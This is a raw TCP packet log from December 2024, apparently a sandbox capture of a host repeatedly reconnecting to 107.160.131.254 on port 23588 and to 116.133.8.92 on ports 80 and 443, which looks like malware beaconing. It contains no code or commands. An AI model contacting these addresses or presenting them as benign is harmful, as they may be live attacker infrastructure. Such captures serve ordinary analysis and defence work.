                                                                                                                                          Dec 19, 2024 15:33:49.554570913 CET4985723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:49.667277098 CET4985923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:49.673451900 CET4983280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.674576044 CET4986080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.676637888 CET2358849857107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.676724911 CET4985723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:49.679462910 CET4985723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:49.786819935 CET2358849859107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.788395882 CET4985923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:49.793386936 CET8049832116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.794222116 CET8049860116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.794333935 CET4983280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.794390917 CET4986080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.799171925 CET2358849857107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.928164005 CET4985923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:49.928282976 CET4986080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:50.047926903 CET2358849859107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:50.047943115 CET8049860116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:53.576109886 CET4985923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.576147079 CET4986080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:53.576175928 CET4985723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.577049017 CET4989723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.696676970 CET2358849897107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:53.696827888 CET4989723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.697033882 CET4989723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.697571993 CET4989980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:53.698081970 CET4990023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.816778898 CET2358849897107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:53.817189932 CET8049899116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:53.817297935 CET4989980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:53.817512035 CET2358849900107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:53.817563057 CET4990023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.818470955 CET4989980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:53.818614960 CET4990023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:53.938096046 CET8049899116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:53.938267946 CET2358849900107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:56.329720974 CET8049899116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:56.329823971 CET4989980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:56.337495089 CET49924443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:56.337547064 CET44349924116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:56.338136911 CET49924443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:56.338136911 CET49924443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:56.338171005 CET44349924116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:57.708281994 CET4990023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:57.708319902 CET49924443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:57.708363056 CET4989723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:57.710704088 CET4993823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:57.830934048 CET2358849938107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:57.831105947 CET4993823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:57.912029982 CET4993823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:58.031501055 CET2358849938107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:58.054681063 CET4994323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:58.054883003 CET4989980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:58.055083990 CET4994480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:58.176608086 CET2358849943107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:58.176624060 CET8049944116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:58.177007914 CET4994480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:58.177011967 CET4994323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:58.177066088 CET4994323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:58.177181959 CET4994480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:58.178617954 CET8049899116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:58.178695917 CET4989980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:58.296785116 CET2358849943107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:58.296859026 CET8049944116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:01.922280073 CET4994323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:01.922307968 CET4994480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:01.922314882 CET4993823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:01.922878981 CET4998023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:02.036874056 CET4998223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:02.039093971 CET4998380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:02.044032097 CET2358849980107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:02.044136047 CET4998023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:02.044260025 CET4998023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:02.156893015 CET2358849982107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:02.158396006 CET4998223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:02.158725023 CET4998223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:02.158845901 CET8049983116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:02.158909082 CET4998380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:02.159209013 CET4998380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:02.163862944 CET2358849980107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:02.279158115 CET2358849982107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:02.280193090 CET8049983116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:03.882188082 CET8049983116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:03.882292986 CET4998380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:03.885150909 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:03.885200024 CET44350003116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:03.885324955 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:03.885705948 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:03.885720968 CET44350003116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:05.747549057 CET44350003116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:05.747739077 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:05.748351097 CET44350003116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:05.748497009 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:05.880836010 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:05.880847931 CET44350003116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:05.881215096 CET44350003116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:05.881376982 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:05.883748055 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:05.931324005 CET44350003116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:05.938340902 CET4998223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:05.938911915 CET4998023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:05.939052105 CET50003443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:05.940932989 CET5002623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:06.049819946 CET5002823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:06.062155008 CET2358850026107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:06.062333107 CET5002623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:06.062958956 CET5002623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:06.065253973 CET4998380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:06.065603971 CET5002980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:06.170017958 CET2358850028107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:06.170192957 CET5002823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:06.170423985 CET5002823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:06.182923079 CET2358850026107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:06.185122967 CET8050029116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:06.185198069 CET8049983116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:06.185333014 CET4998380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:06.185336113 CET5002980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:06.185621977 CET5002980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:06.291354895 CET2358850028107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:06.308163881 CET8050029116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:07.900721073 CET8050029116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:07.901128054 CET5002980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:08.038758039 CET50049443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:08.038814068 CET44350049116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:08.039057970 CET50049443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:08.039566994 CET50049443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:08.039578915 CET44350049116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:09.938157082 CET5002823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:09.938193083 CET5002623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:09.938216925 CET50049443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:09.939081907 CET5007223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:10.058772087 CET2358850072107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:10.058870077 CET5007223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:10.077888966 CET5007223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:10.090518951 CET5002980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:10.090868950 CET5007380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:10.104247093 CET5007423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:10.197490931 CET2358850072107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:10.210580111 CET8050073116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:10.210716963 CET8050029116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:10.210726976 CET5007380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:10.210797071 CET5002980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:10.211318970 CET5007380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:10.224056005 CET2358850074107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:10.224257946 CET5007423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:10.224524975 CET5007423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:10.330856085 CET8050073116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:10.344093084 CET2358850074107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:11.998063087 CET8050073116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:11.998148918 CET5007380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:12.001326084 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:12.001368999 CET44350097116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:12.001485109 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:12.001820087 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:12.001832008 CET44350097116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:13.951936960 CET44350097116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:13.952047110 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:13.952752113 CET44350097116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:13.952811956 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:13.959856033 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:13.959867954 CET44350097116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:13.960139036 CET44350097116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:13.960187912 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:13.965804100 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:14.007333994 CET44350097116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:14.078380108 CET5007223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.078460932 CET5007423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.078495026 CET50097443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:14.081377983 CET5012123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.193711042 CET5012323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.201488018 CET2358850121107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:14.204520941 CET5012123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.206903934 CET5012123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.208775997 CET5012480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:14.208782911 CET5007380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:14.313298941 CET2358850123107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:14.313465118 CET5012323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.320843935 CET5012323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:14.326488972 CET2358850121107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:14.328382969 CET8050124116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:14.328471899 CET5012480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:14.328800917 CET8050073116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:14.328912973 CET5007380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:14.329119921 CET5012480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:14.440408945 CET2358850123107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:14.448537111 CET8050124116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:16.124452114 CET8050124116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:16.124536991 CET5012480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:16.129477978 CET50147443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:16.129528046 CET44350147116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:16.129622936 CET50147443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:16.129914045 CET50147443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:16.129925966 CET44350147116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:18.094275951 CET50147443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:18.094295979 CET5012123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.094295979 CET5012323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.097434998 CET5016623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.218064070 CET2358850166107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:18.218162060 CET5016623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.218353033 CET5016623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.227597952 CET5012480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:18.228080988 CET5016980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:18.228084087 CET5016823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.337897062 CET2358850166107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:18.347901106 CET8050124116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:18.347913980 CET2358850168107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:18.348072052 CET5012480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:18.348078966 CET5016823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.348092079 CET8050169116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:18.348443031 CET5016980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:18.348444939 CET5016823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:18.348536015 CET5016980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:18.468226910 CET2358850168107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:18.468430042 CET8050169116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:20.060470104 CET8050169116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:20.060517073 CET5016980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:20.070276022 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:20.070319891 CET44350187116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:20.070408106 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:20.071053028 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:20.071069956 CET44350187116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.025418043 CET44350187116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.025629044 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.026194096 CET44350187116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.026312113 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.042177916 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.042186975 CET44350187116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.042542934 CET44350187116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.042707920 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.043036938 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.083328962 CET44350187116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.219353914 CET5016623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.219408035 CET5016823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.220726013 CET50187443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.220727921 CET5020823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.332731962 CET5021023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.340567112 CET2358850208107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.340701103 CET5020823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.340991974 CET5020823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.346349955 CET5016980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.346750021 CET5021180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.452666044 CET2358850210107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.452857018 CET5021023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.453018904 CET5021023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:22.460421085 CET2358850208107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.466293097 CET8050211116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.466387987 CET5021180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.466522932 CET8050169116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.466999054 CET5016980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.470470905 CET5021180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:22.573014975 CET2358850210107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:22.591110945 CET8050211116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:26.235546112 CET5021180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:26.235588074 CET5021023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.235589027 CET5020823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.241360903 CET5025623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.350404978 CET5026023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.350744963 CET5026180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:26.361016989 CET2358850256107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:26.361135006 CET5025623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.361413002 CET5025623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.470257998 CET2358850260107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:26.470361948 CET8050261116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:26.470391989 CET5026023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.470427990 CET5026180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:26.470549107 CET5026023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:26.470716953 CET5026180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:26.480865955 CET2358850256107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:26.590111971 CET2358850260107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:26.590503931 CET8050261116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:28.300256968 CET8050261116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:28.300492048 CET5026180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:28.306432009 CET50283443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:28.306478024 CET44350283116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:28.306598902 CET50283443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:28.306951046 CET50283443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:28.306962013 CET44350283116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.136132956 CET44350283116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.136307955 CET50283443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.137195110 CET50283443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.137219906 CET44350283116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.138678074 CET50283443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.138689995 CET44350283116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.260067940 CET5025623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.260102034 CET50283443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.260102034 CET5026023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.260580063 CET5030823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.380490065 CET2358850308107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.380790949 CET5030823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.385987997 CET5030823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.386729002 CET5031123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.395463943 CET5026180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.395792961 CET5031280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.505877018 CET2358850308107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.506545067 CET2358850311107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.506643057 CET5031123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.507567883 CET5031123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:30.515300035 CET8050312116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.515507936 CET5031280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.515584946 CET8050261116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.515641928 CET5026180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.517781973 CET5031280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:30.875124931 CET5031280192.168.2.5116.133.8.92
